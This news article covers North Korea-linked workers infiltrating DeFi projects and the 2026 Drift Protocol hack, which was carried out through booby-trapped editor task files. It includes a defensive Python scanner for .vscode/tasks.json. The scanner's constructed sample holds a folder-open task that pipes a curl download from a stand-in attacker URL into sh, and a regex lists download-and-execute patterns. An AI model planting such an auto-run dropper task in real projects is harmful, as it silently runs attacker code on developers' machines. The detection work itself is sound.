
North Korea‑connected operatives have spent years quietly embedding themselves inside crypto companies and DeFi projects.
A Long-Standing Crypto-Infiltration Saga
News and reports from the Democratic People’s Republic of Korea tend to have a conspiracy-theory, action-movie feel to them. They also tend to be true and not exaggerated at all.
This time, security researcher and MetaMask developer Taylor Monahan said in a Sunday post on the social network X that these methods date back to DeFi’s formative years, with actors linked to the DPRK quietly contributing to several major, widely used protocols.
Yuppppppp
Lots of DPRK IT Workers built the protocols you know and love, all the way back to defi summer
The “7 years blockchain dev experience” on their resume is not a lie. https://t.co/EQNgl5KhJ5
— Tay 💖 (@tayvano_) April 5, 2026
She claims that North Korean IT workers have quietly worked inside more than 40 DeFi projects over roughly seven years, including protocols that became household names after DeFi summer.
oh god uhhhh like sushi, thorchain, yam, pickle, harvest, reclaim, swing, paid, naos, shezmu, qrolli, saffron, sifu, napier, harmony, blueberry, stabble, onering, elemental, divvy, la token, impermax, kira, cook, fantom, ankr, gamerse, metaplay, spice, beanstalk, deltaprime,…
— Tay 💖 (@tayvano_) April 5, 2026
These workers often have “real” on‑chain experience (seven years of blockchain development) but operate under stolen or synthetic identities, plugging into teams via normal hiring funnels.
Her posts reply to tim, a pseudonymous builder and the public face of Titan, a Solana‑based DEX aggregator and routing project, who said that at a previous job his team interviewed an extremely qualified candidate who turned out to be an operative of Lazarus, the North Korea‑affiliated group that has funneled billions of dollars in stolen funds through cryptocurrency networks.
at a previous job, we interviewed someone who turned out to be a Lazarus operative. he did video calls and was extremely qualified
we invited him for in person interviews and he ultimately declined to fly out, so we passed
only later did we find his name in a Lazarus info dump… https://t.co/Vnvffrkjee
— tim | Titan (@timahhl) April 5, 2026
Renowned crypto detective ZachXBT also replied to tim’s post, explaining that this is not just “Lazarus” but a network of DPRK units (Lazarus, APT38, AppleJeus, etc.) coordinated by the Reconnaissance General Bureau and optimized for financial cybercrime. Their methods are based on “basic, relentless” outreach via LinkedIn, job boards, interviews, Zoom, plus remote dev roles that teams still grant far too easily.
Lazarus Group is the collective name for all DPRK state sponsored cyber actors.
The main issue is everyone groups them all together when the complexity of the threats is different.
Threats via job postings, LinkedIn, email, Zoom, or interviews are basic and in no way… pic.twitter.com/NL8Jck5edN
— ZachXBT (@zachxbt) April 5, 2026
Recent sanctions by the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) and Chainalysis findings indicate that DPRK IT networks generated $800 million in 2024 alone and have moved billions in stolen crypto since 2017, feeding the regime’s weapons of mass destruction (WMD) and missile programs.
New Information On The Crypto-Hack On Drift Protocol
The April 1st $285 million attack on Drift Protocol reignited fears about insider threats from North Korea, especially after the protocol itself confirmed on Saturday that speculation linking the attack to North Korean hacking groups was right.
— Drift (@DriftProtocol) April 5, 2026
They attributed the attack “with medium confidence” to UNC4736, a North Korea–aligned, state‑sponsored hacking group.
The protocol claimed the attackers relied on an elaborate social engineering strategy: fake professional personas, in‑person conference interactions, and booby‑trapped developer tooling to compromise contributors before finally executing the exploit. The attackers posed as a legitimate trading firm, met Drift contributors in person across several countries, and used fully constructed identities with work histories and professional networks before triggering the exploit.
The attackers weaponized common developer tooling by slipping malicious tasks into VS Code and Cursor configurations, delivering a compromised repository that contributors ran locally without realizing it. Taken together, this makes the incident far more like an insider‑style supply‑chain compromise than a straightforward smart contract exploit.
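As an added example (not code from the article, from Drift, or from any of the researchers quoted), the following Python script shows the defender’s side of the “malicious task in the editor configuration” technique: it parses a repository’s `.vscode/tasks.json` (VS Code and Cursor both read this file, in a JSON-with-comments dialect) and flags tasks that run automatically when the folder is opened, fetch and execute remote content, or hide their terminal output. The sample `tasks.json` is constructed for this example, the `example.invalid` URL is a hypothetical attacker endpoint, and the heuristics are the author’s own, not a published detection rule.

```python
from __future__ import annotations

import json
import re

# Commands that pull something from the network and pipe it into an interpreter,
# or decode a blob inline: the usual shape of a one-line dropper in a task.
DOWNLOAD_EXEC = re.compile(
    r"\b(curl|wget|Invoke-WebRequest|iwr)\b.*\|\s*(sh|bash|zsh|python|node|powershell)\b"
    r"|base64\s+(-d|--decode)",
    re.IGNORECASE,
)


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments and trailing commas from JSON-with-comments,
    the dialect VS Code uses for tasks.json, without touching string contents
    (so a '//' inside a URL string survives)."""
    out: list[str] = []
    i, n, in_str = 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped char as-is
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):        # line comment
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):        # block comment
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    # drop trailing commas before a closing brace/bracket
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def find_suspicious_tasks(tasks_json: str) -> list[dict]:
    """Return one finding per task that auto-runs, fetches-and-executes, or hides output."""
    doc = json.loads(strip_jsonc(tasks_json))
    findings = []
    for task in doc.get("tasks", []):
        run_on = (task.get("runOptions") or {}).get("runOn")
        reveal = (task.get("presentation") or {}).get("reveal")
        parts = [str(task.get("command", ""))] + [str(a) for a in (task.get("args") or [])]
        full_cmd = " ".join(parts).strip()
        reasons = []
        if run_on == "folderOpen":
            reasons.append("runs automatically on folder open (runOptions.runOn=folderOpen)")
        if DOWNLOAD_EXEC.search(full_cmd):
            reasons.append("fetches and executes remote content")
        if reveal == "never":
            reasons.append("terminal output hidden (presentation.reveal=never)")
        if reasons:
            findings.append({"label": task.get("label"), "command": full_cmd, "reasons": reasons})
    return findings


# Constructed sample, not a file from any real repository.
SAMPLE_TASKS_JSON = r'''{
  // a normal-looking build task followed by a booby-trapped one
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "cargo build --release",
      "group": "build",
    },
    {
      "label": "sync deps",
      "type": "shell",
      "command": "curl -s https://example.invalid/setup.sh | sh", // hypothetical attacker URL
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" }
    }
  ]
}'''

if __name__ == "__main__":
    for f in find_suspicious_tasks(SAMPLE_TASKS_JSON):
        print(f"[!] task {f['label']!r}: {f['command']}")
        for r in f["reasons"]:
            print(f"      - {r}")
```

Run this against `.vscode/tasks.json` (and `launch.json` pre-launch tasks) before opening an unfamiliar repository in the editor; in VS Code the `task.allowAutomaticTasks` setting can be set to `"off"` in user settings, and automatic tasks do not run in a workspace you have not marked as trusted, so declining the trust prompt on a repository from a stranger is the cheapest control.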
The day after the attack, Ledger CTO Charles Guillemet linked the attack method to Bybit’s $1.4 billion hack, which was attributed to the regime’s cyber units. Then, on Friday, blockchain analytics firm Elliptic released an investigation claiming that the on‑chain behavior, laundering methods, and network‑level indicators match the techniques seen in prior DPRK‑linked operations. Bitcoinist covered the story.
Market Implications
This crypto‑hacking saga has turned into a structural national‑security risk. Regulators and sanctions bodies are already tightening around DPRK IT networks, and more aggressive enforcement is likely to follow.
Large, state‑linked exploits create latent protocol risk: higher insurance premia, potential delistings, governance infighting over restitution, and longer risk‑off periods for DeFi tokens and perp volumes.

Cover image from Perplexity. BTCUSDT chart from Tradingview.

Editorial Process for bitcoinist is centered on delivering thoroughly researched, accurate, and unbiased content. We uphold strict sourcing standards, and each page undergoes diligent review by our team of top technology experts and seasoned editors. This process ensures the integrity, relevance, and value of our content for our readers.